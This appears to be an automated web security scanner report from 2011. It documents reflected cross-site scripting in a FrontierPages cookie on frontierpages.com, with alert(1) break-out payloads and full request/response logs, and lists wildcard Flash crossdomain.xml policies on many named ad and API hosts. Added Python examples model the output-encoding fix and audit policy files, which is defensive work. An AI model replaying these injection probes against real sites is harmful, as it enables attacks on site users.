Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas6394a"><script>alert(1)</script>5a4e9c709b5

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19014
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:43:09 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yp.frontierpages.com/results.aspx?term=Government+Offices&city=Dallas6394a"><script>alert(1)</script>5a4e9c709b5&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

2.133. http://www.frontierpages.com/ [FrontierPages cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /

Issue detail

The value of the FrontierPages cookie is copied into an HTML comment. The payload 1c7d1--><script>alert(1)</script>28ca95d684b was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas1c7d1--><script>alert(1)</script>28ca95d684b

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19016
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:43:14 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp?city=Dallas1c7d1--><script>alert(1)</script>28ca95d684b&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

2.134. http://www.frontierpages.com/region.asp [FrontierPages cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /region.asp

Issue detail

The value of the FrontierPages cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf27"><script>alert(1)</script>cc197d9f09f was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /region.asp HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallascbf27"><script>alert(1)</script>cc197d9f09f

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19014
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:45:37 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yp.frontierpages.com/results.aspx?term=Government+Offices&city=Dallascbf27"><script>alert(1)</script>cc197d9f09f&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

2.135. http://www.frontierpages.com/region.asp [FrontierPages cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /region.asp

Issue detail

The value of the FrontierPages cookie is copied into an HTML comment. The payload 8b18d--><script>alert(1)</script>394a50af88d was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /region.asp HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas8b18d--><script>alert(1)</script>394a50af88d

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 18173
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:45:39 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp?city=Dallas8b18d--><script>alert(1)</script>394a50af88d&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...
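Findings 2.134 and 2.135 are the same cookie value landing in two different HTML contexts (a double-quoted attribute and an HTML comment), which is why the scanner sent two different break-out sequences. The Python below is an added example, not code from this report or from frontierpages.com: it models the echo with a constructed template (the real region.asp markup is not reproduced; yp.example.test and the prefix/suffix hex are illustrative), shows the per-sink output encoding that closes both findings, and reproduces the scanner's "Certain" rule, namely that the whole payload, break-out characters included, must come back byte-for-byte in a context where that break-out actually works.

```python
import html
import re
from urllib.parse import quote

# Constructed template modelled on the two echo points the report shows for the
# FrontierPages cookie: an HTML comment and a double-quoted href attribute.
# It is a simplification for illustration, not the real region.asp markup.
TEMPLATE = (
    '<!-- region: {comment_city} -->\n'
    '<a href="http://yp.example.test/results.aspx?term=Government+Offices'
    '&city={attr_city}&state=TX">Government Offices</a>\n'
)


def render_unsafe(city):
    """Echo the cookie-derived value verbatim: the behaviour reported in 2.134/2.135."""
    return TEMPLATE.format(comment_city=city, attr_city=city)


def render_safe(city):
    """Encode for each sink. The href value is a URL query parameter, so it is
    URL-encoded first and then HTML-encoded for the attribute; the comment
    text is HTML-encoded so '-->' can no longer terminate the comment."""
    return TEMPLATE.format(
        comment_city=html.escape(city, quote=True),
        attr_city=html.escape(quote(city, safe=''), quote=True),
    )


def context_of(body, pos):
    """Classify the HTML context at offset `pos` by scanning the text before it."""
    before = body[:pos]
    if before.rfind('<!--') > before.rfind('-->'):
        return 'comment'
    tag_open = before.rfind('<')
    if tag_open > before.rfind('>'):
        # Inside a tag: an odd number of double quotes since '<' means the
        # offset lies inside a double-quoted attribute value.
        return 'attribute' if before[tag_open:].count('"') % 2 else 'tag'
    return 'text'


# One break-out sequence per context, in the shape of the scanner's probes
# (the report's payloads are prefix + break-out + suffix with random hex).
BREAKOUTS = {
    'attribute': '"><script>alert(1)</script>',
    'comment': '--><script>alert(1)</script>',
}


def vulnerable_contexts(render, prefix='cbf27', suffix='cc197d9f09f'):
    """Return the contexts in which the matching break-out payload is echoed
    unmodified, i.e. where a scanner would report XSS with confidence 'Certain'.
    A payload echoed intact in the *wrong* context (e.g. '-->' inside a quoted
    attribute) is not counted, because it does not break out there."""
    hits = set()
    for ctx, breakout in BREAKOUTS.items():
        payload = prefix + breakout + suffix
        body = render('Dallas' + payload)
        for m in re.finditer(re.escape(prefix), body):
            if context_of(body, m.start()) == ctx and body.startswith(payload, m.start()):
                hits.add(ctx)
    return hits


if __name__ == '__main__':
    print('unencoded:', sorted(vulnerable_contexts(render_unsafe)))  # ['attribute', 'comment']
    print('encoded:  ', sorted(vulnerable_contexts(render_safe)))    # []
```

Two caveats a tester would add to these entries. First, encoding inside a comment is a fallback; the cleaner fix is not to emit request-derived data into HTML comments at all. Second, the report's "not trivial to exploit" qualifier for cookie-sourced XSS hinges on whether the attacker has a cookie-setting primitive, and the usual ones are a header injection or an XSS on any other host under the same registrable domain, since a cookie set with Domain=.frontierpages.com is sent to www.frontierpages.com; this report demonstrates no such primitive for frontierpages.com, so the severity stays at the scanner's rating until one is found.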

3. Flash cross-domain policy
There are 94 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
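The 94 instances that follow differ only in the details of the policy file, so the review the remediation text asks for is best done mechanically. The Python below is an added example, not part of this report: it parses a crossdomain.xml body and flags the settings that appear in the responses further down, namely a wildcard allow-access-from (rated High, matching the report), secure="false", a site-control meta-policy of "all", and a wildcard allow-http-request-headers-from (rated Medium here; these ratings are this example's own). The sample policies are constructed, modelled on the responses in 3.1, 3.4 and 3.5 rather than copied from them, and www.example.test is a placeholder.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies modelled on the responses in 3.1, 3.4 and 3.5
# of this report (wildcard only; wildcard with secure="false"; wildcard with a
# site-control meta-policy and a header grant). Not copied byte-for-byte.
POLICY_WILDCARD = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>"""

POLICY_SECURE_FALSE = """<?xml version="1.0"?>
<cross-domain-policy>
<!-- if this file is also served over HTTPS, secure=false lets plain-HTTP SWFs in -->
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>"""

POLICY_META_ALL = """<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>"""

POLICY_RESTRICTED = """<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="www.example.test" secure="true"/>
</cross-domain-policy>"""


def audit_policy(xml_text):
    """Return (severity, message) findings for one crossdomain.xml body.

    A wildcard domain grant is High, as in the report, because it gives every
    origin two-way access in the user's cookie context; the other settings
    widen that exposure and are rated Medium in this example."""
    root = ET.fromstring(xml_text)
    if root.tag != 'cross-domain-policy':
        return [('Info', 'root element is <%s>, not <cross-domain-policy>' % root.tag)]
    findings = []
    meta = root.find('site-control')
    if meta is not None and meta.get('permitted-cross-domain-policies') == 'all':
        findings.append(('Medium', 'site-control "all": a policy file in any directory '
                         'is honoured, so any user-writable path could grant access'))
    for rule in root.findall('allow-access-from'):
        domain = rule.get('domain', '')
        if domain == '*':
            findings.append(('High', 'allow-access-from domain="*": every domain gets two-way access'))
        elif domain.startswith('*.'):
            findings.append(('Medium', 'allow-access-from domain="%s": every host under '
                             'that suffix is trusted' % domain))
        if rule.get('secure', 'true').lower() == 'false':
            findings.append(('Medium', 'secure="false": when this policy is served over HTTPS, '
                             'SWFs loaded over plain HTTP may read HTTPS content'))
    for rule in root.findall('allow-http-request-headers-from'):
        if rule.get('domain') == '*':
            findings.append(('Medium', 'allow-http-request-headers-from domain="*" headers="%s": '
                             'any domain may add request headers' % rule.get('headers', '')))
    return findings


def worst_severity(findings):
    """Collapse a finding list to the single severity a report summary would show."""
    order = {'High': 3, 'Medium': 2, 'Info': 1}
    return max((s for s, _ in findings), key=order.get, default='None')


if __name__ == '__main__':
    samples = {'wildcard': POLICY_WILDCARD, 'secure_false': POLICY_SECURE_FALSE,
               'meta_all': POLICY_META_ALL, 'restricted': POLICY_RESTRICTED}
    for name, body in samples.items():
        findings = audit_policy(body)
        print(name, worst_severity(findings))
        for sev, msg in findings:
            print('  [%s] %s' % (sev, msg))
```

Two points for triage. The scanner rates every wildcard as High regardless of what the host serves; the qualifier in each entry below ("unless the application consists entirely of unprotected public content") is the real test, so for each of the ad, analytics and CDN hosts listed, check whether any response on that host varies with the browser's cookies before carrying the High rating into a report. And because every request in this section was made over plain HTTP, secure="false" has no effect on what was fetched; it matters only if the same file is also served at an https:// origin of that host, which is worth confirming separately.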


3.1. http://40.xg4ken.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 40.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "2b8012-c6-a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.2. http://ad.agkn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.agkn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"219-1313398290000"
Last-Modified: Mon, 15 Aug 2011 08:51:30 GMT
Content-Type: application/xml
Content-Length: 219
Date: Tue, 06 Sep 2011 12:44:56 GMT
Connection: close

<?xml version="1.0"?>
    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
    <cross-domain-policy>
    <allow-access-from domain="*" />
    </cr
...[SNIP]...

3.3. http://ad.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 06 Sep 2011 12:44:53 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 06 Sep 2011 12:44:52 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

3.4. http://admin.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Tue, 06 Sep 2011 12:52:29 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.5. http://ads.media.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.media.net

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 27 Oct 2010 16:15:37 GMT
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.6. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:14ff"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:45:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.7. http://ads.yimg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.yimg.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 00:39:28 GMT
Cache-Control: max-age=315360000
Expires: Fri, 03 Sep 2021 00:39:28 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 43538
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.8. http://ads.yldmgrimg.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.yldmgrimg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.yldmgrimg.net

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 19 Oct 2009 20:41:08 GMT
ETag: "YM:1:f3afab59-44f8-4ca0-8b65-b58ac0bf0f75-gzip"
Content-Type: text/xml
Server: YTS/1.17.24
x-ysws-request-id: 36c54333-d328-4465-a4d1-5fdacf21cbd6
Cache-Control: max-age=315294929
Expires: Thu, 02 Sep 2021 18:40:27 GMT
Date: Tue, 06 Sep 2011 12:44:58 GMT
Content-Length: 403
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.9. http://adserver.teracent.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"373-1310680427000"
Last-Modified: Thu, 14 Jul 2011 21:53:47 GMT
Content-Type: application/xml
Content-Length: 373
Date: Tue, 06 Sep 2011 12:48:07 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.10. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 12:55:54 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.11. http://api.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Thu, 06 Oct 2011 12:49:45 GMT
X-FB-Server: 10.28.9.121
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

3.12. http://as.casalemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Tue, 06 Sep 2011 12:45:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.13. http://as1.suitesmart.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as1.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e27-ca-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Date: Tue, 06 Sep 2011 12:44:42 GMT
Connection: close
Cache-Control: no-store

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.14. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 12:45:57 GMT
Date: Tue, 06 Sep 2011 12:45:57 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.15. http://by.optimost.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "784904063"
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Content-Length: 200
Server: Fast
